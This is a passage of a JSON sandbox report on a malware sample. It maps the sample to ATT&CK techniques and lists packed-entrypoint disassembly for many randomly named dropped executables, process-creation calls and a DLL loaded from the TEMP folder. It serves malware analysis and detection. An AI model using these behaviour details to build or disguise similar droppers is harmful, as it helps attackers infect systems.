"informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jvhfn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"042468.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2626426.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"8428466.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"npxxxd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pffjpht.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vjxrx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"trnnjf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ttfvnn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"240606.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"6402288.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bttfvf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hnjnfnj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rjfjrfn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jfhhd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"6804604.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"42828.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"068420.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4640804.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"866846.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"22840.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"24642.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"240802.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tbnhh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jvhfn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"042468.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2626426.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"8428466.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"npxxxd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pffjpht.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vjxrx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"trnnjf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ttfvnn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"240606.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"6402288.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bttfvf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hnjnfnj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rjfjrfn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jfhhd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"6804604.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"42828.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"068420.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4640804.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"866846.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"22840.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"24642.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"240802.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tbnhh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f49576@RPCRT4.dll\"\n \"15001600c03eee6b@ADVAPI32.dll\"\n \"0e000f00703fee6b@ADVAPI32.dll\"\n \"0e000f00cc3fee6b@ADVAPI32.dll\"\n \"11001200b447ee6b@ADVAPI32.dll\"\n \"110012004848ee6b@ADVAPI32.dll\"\n \"120013008c48ee6b@ADVAPI32.dll\"\n \"12001300e448ee6b@ADVAPI32.dll\"\n \"14001500386eee6b@ADVAPI32.dll\"\n \"14001500506eee6b@ADVAPI32.dll\"\n \"14001500686eee6b@ADVAPI32.dll\"\n \"17001800806eee6b@ADVAPI32.dll\"\n \"0d000e00986eee6b@ADVAPI32.dll\"\n \"11001200a86eee6b@ADVAPI32.dll\"\n \"11001200bc6eee6b@ADVAPI32.dll\"\n \"0f001000fc6fee6b@ADVAPI32.dll\"\n \"140015003c70ee6b@ADVAPI32.dll\"\n \"140015005470ee6b@ADVAPI32.dll\"\n \"0c000d009c70ee6b@ADVAPI32.dll\"\n \"0c000d00ac70ee6b@ADVAPI32.dll\"\n \"0e000f00bc70ee6b@ADVAPI32.dll\"\n \"0e000f00cc70ee6b@ADVAPI32.dll\"\n \"0b000c00dc70ee6b@ADVAPI32.dll\"\n \"180019001473ee6b@RPCRT4.dll\"\n \"130014004073ee6b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"hnvpxj.exe\" called \"CreateProcessA\" with parameter \"c:\\hrrnrd.exe\" - (UID: 00000000-00006032)\n \"464448.exe\" called \"CreateProcessA\" with parameter \"c:\\jlrnp.exe\" - (UID: 00000000-00003568)\n \"djlfb.exe\" called \"CreateProcessA\" with parameter \"c:\\4804042.exe\" - (UID: 00000000-00004132)\n \"pjjvtd.exe\" called \"CreateProcessA\" with parameter \"c:\\pdhfl.exe\" - (UID: 00000000-00001500)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"hnvpxj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"hnvpxj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hnvpxj.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"hnvpxj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hnvpxj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"lbjvvjh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"lbjvvjh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lbjvvjh.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"lbjvvjh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lbjvvjh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"pdvxbf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"pdvxbf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pdvxbf.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"pdvxbf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pdvxbf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"frdfrrr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"frdfrrr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"frdfrrr.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"frdfrrr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"frdfrrr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"464448.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"464448.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"464448.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"464448.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"464448.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"464448.exe\" loaded module 